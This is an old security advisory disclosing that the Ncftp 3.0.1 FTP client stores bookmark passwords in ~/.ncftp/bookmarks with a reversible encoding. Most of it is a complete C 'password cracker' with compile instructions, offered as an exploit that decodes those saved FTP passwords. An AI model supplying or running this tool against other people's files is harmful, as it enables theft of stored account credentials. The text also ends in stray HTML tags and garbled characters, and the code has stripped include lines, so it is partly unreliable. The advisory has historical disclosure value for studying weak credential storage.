Ncftp client Vulnerability Date: 16/08/2000 System: Ncftp 3.0.1 (and certainly Author: zorgon Web: http://www.nightbird.free.fr Excuse me for my poor english :) Description ------------- Ncftp is a ftp client very practical at the base. Among its functionalities, it possible to create bookmarks of your accounts. For each bookmark, one can record server ftp, the login and the password which will be encrypted (if you decide also to back up the password). The whole is backup in the file ~/.ncftp/bookmarks. The problem comes from the algorithm of encoding of the password which it is possible to break. Exploit ----------- /* * Ncftp password cracker * by zorgon * -- http://zorgon.freeshell.org -- * * Compile: gcc -o cracknctp crackncftp.c -Wall * * Note: you don't need the string "*encoded*" * of the encrypted password in the file * ~/.ncftp/bookmarks * */ #include void Decode(void *, const void *, size_t, int); static const unsigned char B64DecodeTable[256] = { '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 000-007 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 010-017 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 020-027 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 030-037 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 040-047 */ '\177', '\177', '\177', '\76', '\177', '\177', '\177', '\77', /* 050-057 */ '\64', '\65', '\66', '\67', '\70', '\71', '\72', '\73', /* 060-067 */ '\74', '\75', '\177', '\177', '\177', '\100', '\177', '\177', /* 070-077 */ '\177', '\0', '\1', '\2', '\3', '\4', '\5', '\6', /* 100-107 */ '\7', '\10', '\11', '\12', '\13', '\14', '\15', '\16', /* 110-117 */ '\17', '\20', '\21', '\22', '\23', '\24', '\25', '\26', /* 120-127 */ '\27', '\30', '\31', '\177', '\177', '\177', '\177', '\177', /* 130-137 */ '\177', '\32', '\33', '\34', '\35', '\36', '\37', '\40', /* 140-147 */ '\41', '\42', '\43', '\44', '\45', '\46', '\47', '\50', /* 150-157 */ '\51', '\52', '\53', '\54', '\55', '\56', '\57', '\60', /* 160-167 */ '\61', '\62', '\63', '\177', '\177', '\177', '\177', '\177', /* 170-177 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 200-207 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 210-217 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 220-227 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 230-237 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 240-247 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 250-257 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 260-267 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 270-277 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 300-307 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 310-317 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 320-327 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 330-337 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 340-347 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 350-357 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 360-367 */ '\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177', /* 370-377 */ }; void banner() { fprintf(stdout,"Ncftp password cracker by \n"); fprintf(stdout,"--- http://www.nightbird.free.fr --- \n\n"); } void usage(const char *cmd) { fprintf(stderr,"Usage: %s \n",cmd); } void main(int argc, char *argv[]) { char pass[128]; const void *cryptpass; banner(); if(argc<2){ usage(argv[0]); exit(1); } cryptpass = (const void *)argv[1]; Decode(pass, cryptpass, strlen(cryptpass), 1); printf("Password Encrypted: %s\n",cryptpass); printf("Password Decrypted: %s\n", pass); } void Decode(void *dst0, const void *src0, size_t n, int terminate) { unsigned char *dst; const unsigned char *src, *srclim; unsigned int c0, c1, c2, c3; unsigned int ch; src = src0; srclim = src + n; dst = dst0; while (src < srclim) { c0 = *src++; if (src < srclim) { c1 = *src++; } else { c1 = 0; } if (src < srclim) { c2 = *src++; } else { c2 = 0; } if (src < srclim) { c3 = *src++; } else { c3 = 0; } ch = (((unsigned int) B64DecodeTable[c0]) << 2) | (((unsigned int) B64DecodeTable[c1]) >> 4); dst[0] = (unsigned char) ch; ch = (((unsigned int) B64DecodeTable[c1]) << 4) | (((unsigned int) B64DecodeTable[c2]) >> 2); dst[1] = (unsigned char) ch; ch = (((unsigned int) B64DecodeTable[c2]) << 6) | (((unsigned int) B64DecodeTable[c3])); dst[2] = (unsigned char) ch; dst += 3; } if (terminate != 0) *dst = '\0'; } ------- ================================== zorgon http://www.nightbird.fr.st ---------------------- Do you do Linux? :) Get your FREE @linuxstart.com email address at: http://www.linuxstart.com
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß